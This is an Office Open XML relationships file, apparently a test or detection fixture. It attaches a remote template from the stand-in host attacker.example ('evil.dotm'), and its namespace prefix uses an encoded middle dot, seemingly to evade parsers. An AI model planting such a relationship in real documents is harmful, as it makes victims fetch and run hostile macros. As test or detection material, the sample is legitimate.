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<?xml version="1.0" encoding="UTF-8" standalone="yes"?><a&#183;b:Relationships xmlns:a&#183;b="http://schemas.openxmlformats.org/package/2006/relationships"><a&#183;b:Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://attacker.example/evil.dotm" TargetMode="External"/></a&#183;b:Relationships>
</file>